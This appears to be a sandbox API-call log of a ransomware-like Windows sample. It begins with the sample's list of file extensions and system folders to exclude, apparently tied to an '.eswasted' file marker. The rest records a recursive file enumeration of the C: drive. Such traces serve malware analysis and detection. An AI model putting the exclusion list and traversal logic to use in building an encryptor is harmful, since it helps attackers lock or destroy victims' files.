returned="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" [0069.321] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x250) returned 0x4d5838 [0069.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x4d5838 | out: lpFindFileData=0x4d5838*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x4c3f90 [0069.322] lstrlenW (lpString="$Recycle.Bin") returned 12 [0069.324] FindNextFileW (in: hFindFile=0x4c3f90, lpFindFileData=0x4d5838 | out: lpFindFileData=0x4d5838*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0069.324] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.324] lstrlenW (lpString="Boot") returned 4 [0069.326] FindNextFileW (in: hFindFile=0x4c3f90, lpFindFileData=0x4d5838 | out: lpFindFileData=0x4d5838*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0069.326] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.326] lstrlenW (lpString="bootmgr") returned 7 [0069.326] FindNextFileW (in: hFindFile=0x4c3f90, lpFindFileData=0x4d5838 | out: lpFindFileData=0x4d5838*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0069.326] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.326] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0069.328] FindNextFileW (in: hFindFile=0x4c3f90, lpFindFileData=0x4d5838 | out: lpFindFileData=0x4d5838*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0069.328] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.328] lstrlenW (lpString="Config.Msi") returned 10 [0069.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x4d6a98 | out: lpFindFileData=0x4d6a98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4c45e8 [0069.331] FindNextFileW (in: hFindFile=0x4c45e8, lpFindFileData=0x4d6a98 | out: lpFindFileData=0x4d6a98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.331] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.331] FindNextFileW (in: hFindFile=0x4c45e8, lpFindFileData=0x4d6a98 | out: lpFindFileData=0x4d6a98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0069.331] FindClose (in: hFindFile=0x4c45e8 | out: hFindFile=0x4c45e8) returned 1 [0069.331] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d6a98 | out: hHeap=0x4a0000) returned 1 [0069.331] FindNextFileW (in: hFindFile=0x4c3f90, lpFindFileData=0x4d5838 | out: lpFindFileData=0x4d5838*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0069.331] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.331] lstrlenW (lpString="Documents and Settings") returned 22 [0069.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x4d6a98 | out: lpFindFileData=0x4d6a98*(dwFileAttributes=0x4a00c4, ftCreationTime.dwLowDateTime=0x4c4010, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0xffffffff [0069.332] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d6a98 | out: hHeap=0x4a0000) returned 1 [0069.332] FindNextFileW (in: hFindFile=0x4c3f90, lpFindFileData=0x4d5838 | out: lpFindFileData=0x4d5838*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0069.332] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.332] lstrlenW (lpString="hiberfil.sys") returned 12 [0069.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x4d6a98 | out: lpFindFileData=0x4d6a98*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4c45e8 [0069.332] FindNextFileW (in: hFindFile=0x4c45e8, lpFindFileData=0x4d6a98 | out: lpFindFileData=0x4d6a98*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.332] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.332] FindNextFileW (in: hFindFile=0x4c45e8, lpFindFileData=0x4d6a98 | out: lpFindFileData=0x4d6a98*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0069.332] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.332] lstrlenW (lpString="All Users") returned 9 [0069.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7f50 [0069.335] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.336] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.336] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0069.336] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.336] lstrlenW (lpString="{90140000-0016-0409-1000-0000000FF1CE}-C") returned 40 [0069.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d8f98 | out: lpFindFileData=0x4d8f98*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0069.337] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d8f98 | out: lpFindFileData=0x4d8f98*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.337] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.337] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d8f98 | out: lpFindFileData=0x4d8f98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0069.337] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.337] lstrlenW (lpString="ExcelLR.cab") returned 11 [0069.338] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0069.338] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8f98 | out: hHeap=0x4a0000) returned 1 [0069.338] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0069.338] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0069.338] lstrlenW (lpString="{90140000-0018-0409-1000-0000000FF1CE}-C") returned 40 [0069.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d9f70 | out: lpFindFileData=0x4d9f70*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0070.057] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d9f70 | out: lpFindFileData=0x4d9f70*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.057] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.057] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d9f70 | out: lpFindFileData=0x4d9f70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0070.057] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.057] lstrlenW (lpString="PowerPointMUI.msi") returned 17 [0070.080] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0070.080] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9f70 | out: hHeap=0x4a0000) returned 1 [0070.080] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0070.080] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.080] lstrlenW (lpString="{90140000-0019-0409-1000-0000000FF1CE}-C") returned 40 [0070.080] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0070.212] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.212] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.212] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0070.212] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.212] lstrlenW (lpString="PublisherMUI.msi") returned 16 [0070.227] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0070.227] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.227] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0070.227] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.228] lstrlenW (lpString="{90140000-001A-0409-1000-0000000FF1CE}-C") returned 40 [0070.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0070.262] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.263] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.263] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0070.263] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.263] lstrlenW (lpString="OutlkLR.cab") returned 11 [0070.263] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0070.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.264] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0070.264] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.264] lstrlenW (lpString="{90140000-001B-0409-1000-0000000FF1CE}-C") returned 40 [0070.264] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0070.306] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.306] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.306] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0070.306] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.306] lstrlenW (lpString="Setup.xml") returned 9 [0070.306] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0070.307] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.307] 